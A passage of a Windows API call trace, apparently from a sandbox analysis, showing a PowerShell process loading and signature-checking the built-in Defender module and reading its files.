| out: lpFileInformation=0x1b62da20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0332.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62d6a8) returned 1 [0332.549] GetSystemInfo (in: lpSystemInfo=0x1b62daa0 | out: lpSystemInfo=0x1b62daa0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0332.549] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62d9a8 | out: phkResult=0x1b62d9a8*=0x7cc) returned 0x0 [0332.549] RegQueryValueExW (in: hKey=0x7cc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62d9f8, lpData=0x0, lpcbData=0x1b62d9f0*=0x0 | out: lpType=0x1b62d9f8*=0x0, lpData=0x0, lpcbData=0x1b62d9f0*=0x0) returned 0x2 [0332.549] RegCloseKey (hKey=0x7cc) returned 0x0 [0332.550] CloseHandle (hObject=0x7c4) returned 1 [0332.566] CoCreateGuid (in: pguid=0x1b62db18 | out: pguid=0x1b62db18*(Data1=0x871fcc87, Data2=0x298a, Data3=0x409e, Data4=([0]=0xaa, [1]=0x67, [2]=0xc, [3]=0x6c, [4]=0xce, [5]=0xe5, [6]=0x83, [7]=0xb9))) returned 0x0 [0332.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0332.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0332.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62d208) returned 1 [0332.573] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b62d530 | out: lpFileInformation=0x1b62d530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x4f3126ee, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362d)) returned 1 [0332.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62d1b8) returned 1 [0332.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0332.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0332.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0332.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0332.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62d0c8) returned 1 [0332.574] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b62d3f0 | out: lpFileInformation=0x1b62d3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x4f3126ee, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362d)) returned 1 [0332.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62d078) returned 1 [0332.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0332.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0332.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62d2c8) returned 1 [0332.575] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7c4 [0332.575] GetFileType (hFile=0x7c4) returned 0x1 [0332.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62d238) returned 1 [0332.575] GetFileType (hFile=0x7c4) returned 0x1 [0332.575] WTGetSignatureInfo () returned 0x0 [0332.617] CertDuplicateCertificateContext (pCertContext=0x1a852570) returned 0x1a852570 [0332.617] CryptCATHandleFromStore () returned 0x1aa00fb0 [0332.617] WTHelperGetProvSignerFromChain () returned 0x6f8a20 [0332.617] WTHelperGetProvCertFromChain () returned 0x6fbee0 [0332.618] CertDuplicateCertificateContext (pCertContext=0x1a852470) returned 0x1a852470 [0332.618] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62d338 | out: phkResult=0x1b62d338*=0x7d4) returned 0x0 [0332.619] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62d388, lpData=0x0, lpcbData=0x1b62d380*=0x0 | out: lpType=0x1b62d388*=0x1, lpData=0x0, lpcbData=0x1b62d380*=0x56) returned 0x0 [0332.619] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62d388, lpData=0x246ae88, lpcbData=0x1b62d380*=0x56 | out: lpType=0x1b62d388*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b62d380*=0x56) returned 0x0 [0332.619] RegCloseKey (hKey=0x7d4) returned 0x0 [0332.619] CoTaskMemAlloc (cb=0x10) returned 0x1a86b5d0 [0332.619] CoTaskMemAlloc (cb=0x50) returned 0x1a89a800 [0332.619] WinVerifyTrust () returned 0x0 [0332.620] CoTaskMemFree (pv=0x1a89a800) [0332.620] CoTaskMemFree (pv=0x1a86b5d0) [0332.620] CertFreeCertificateContext (pCertContext=0x1a852570) returned 1 [0332.620] CloseHandle (hObject=0x7c4) returned 1 [0332.620] AmsiOpenSession () returned 0x0 [0332.620] AmsiScanBuffer () returned 0x80070015 [0332.680] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\en-US\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\en-us\\defender.psd1")) returned 0xffffffff [0332.680] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\en\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\en\\defender.psd1")) returned 0xffffffff [0332.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0332.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0332.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0332.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", nBufferLength=0x3c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0332.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0332.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\PSGetModuleInfo.xml", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x4f [0332.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62d048) returned 1 [0332.746] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b62d370 | out: lpFileInformation=0x1b62d370*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0332.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62cff8) returned 1 [0332.748] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml")) returned 0x20 [0332.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0332.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0332.749] CoTaskMemAlloc (cb=0x20c) returned 0x1a8656e0 [0332.749] GetSystemDirectoryW (in: lpBuffer=0x1a8656e0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0332.749] CoTaskMemFree (pv=0x1a8656e0) [0332.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0332.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0332.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9f8) returned 1 [0332.750] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd20 | out: lpFileInformation=0x1b62cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0332.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9a8) returned 1 [0332.750] GetSystemInfo (in: lpSystemInfo=0x1b62cda0 | out: lpSystemInfo=0x1b62cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0332.750] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62cca8 | out: phkResult=0x1b62cca8*=0x7c4) returned 0x0 [0332.750] RegQueryValueExW (in: hKey=0x7c4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62ccf8, lpData=0x0, lpcbData=0x1b62ccf0*=0x0 | out: lpType=0x1b62ccf8*=0x0, lpData=0x0, lpcbData=0x1b62ccf0*=0x0) returned 0x2 [0332.751] RegCloseKey (hKey=0x7c4) returned 0x0 [0332.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0332.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0332.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca48) returned 1 [0332.751] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x2493be0 | out: lpFileInformation=0x2493be0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26e29376, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x37b6)) returned 1 [0332.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0332.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0332.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0332.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9c8) returned 1 [0332.753] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62ccf0 | out: lpFileInformation=0x1b62ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26e29376, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x37b6)) returned 1 [0332.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c978) returned 1 [0332.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0332.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0332.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0332.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0332.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c888) returned 1 [0332.754] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62cbb0 | out: lpFileInformation=0x1b62cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26e29376, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x37b6)) returned 1 [0332.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c838) returned 1 [0332.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0332.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0332.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca88) returned 1 [0332.754] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7c4 [0332.754] GetFileType (hFile=0x7c4) returned 0x1 [0332.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0332.755] GetFileType (hFile=0x7c4) returned 0x1 [0332.755] WTGetSignatureInfo () returned 0x0 [0332.783] CertDuplicateCertificateContext (pCertContext=0x1a851cf0) returned 0x1a851cf0 [0332.783] CryptCATHandleFromStore () returned 0x1aa00fb0 [0332.783] WTHelperGetProvSignerFromChain () returned 0x6f8a20 [0332.783] WTHelperGetProvCertFromChain () returned 0x6fbff0 [0332.784] CertDuplicateCertificateContext (pCertContext=0x1a851d70) returned 0x1a851d70 [0332.785] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62caf8 | out: phkResult=0x1b62caf8*=0x7d4) returned 0x0 [0332.785] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x0, lpcbData=0x1b62cb40*=0x0 | out: lpType=0x1b62cb48*=0x1, lpData=0x0, lpcbData=0x1b62cb40*=0x56) returned 0x0 [0332.785] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x2494478, lpcbData=0x1b62cb40*=0x56 | out: lpType=0x1b62cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b62cb40*=0x56) returned 0x0 [0332.785] RegCloseKey (hKey=0x7d4) returned 0x0 [0332.785] CoTaskMemAlloc (cb=0x10) returned 0x1a86b5d0 [0332.785] CoTaskMemAlloc (cb=0x50) returned 0x1a89a800 [0332.785] WinVerifyTrust () returned 0x0 [0332.786] CoTaskMemFree (pv=0x1a89a800) [0332.786] CoTaskMemFree (pv=0x1a86b5d0) [0332.786] CertFreeCertificateContext (pCertContext=0x1a851cf0) returned 1 [0332.786] CloseHandle (hObject=0x7c4) returned 1 [0332.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0332.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0332.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62cd48) returned 1 [0332.787] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7c4 [0332.787] GetFileType (hFile=0x7c4) returned 0x1 [0332.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62ccb8) returned 1 [0332.787] GetFileType (hFile=0x7c4) returned 0x1 [0332.788] SetFilePointer (in: hFile=0x7c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x0 [0332.788] ReadFile (in: hFile=0x7c4, lpBuffer=0x24955c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x24955c0*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0332.789] SetFilePointer (in: hFile=0x7c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x1000 [0332.789] ReadFile (in: hFile=0x7c4, lpBuffer=0x24955c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x24955c0*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0332.790] SetFilePointer (in: hFile=0x7c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x2000 [0332.790] ReadFile (in: hFile=0x7c4, lpBuffer=0x24955c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x24955c0*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0332.791] SetFilePointer (in: hFile=0x7c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3000 [0332.791] ReadFile (in: hFile=0x7c4, lpBuffer=0x24955c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x24955c0*, lpNumberOfBytesRead=0x1b62cd58*=0x7b6, lpOverlapped=0x0) returned 1 [0332.791] SetFilePointer (in: hFile=0x7c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x37b6 [0332.791] ReadFile (in: hFile=0x7c4, lpBuffer=0x2494cc6, nNumberOfBytesToRead=0x4a, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2494cc6*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0332.791] SetFilePointer (in: hFile=0x7c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x37b6 [0332.791] ReadFile (in: hFile=0x7c4, lpBuffer=0x24955c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 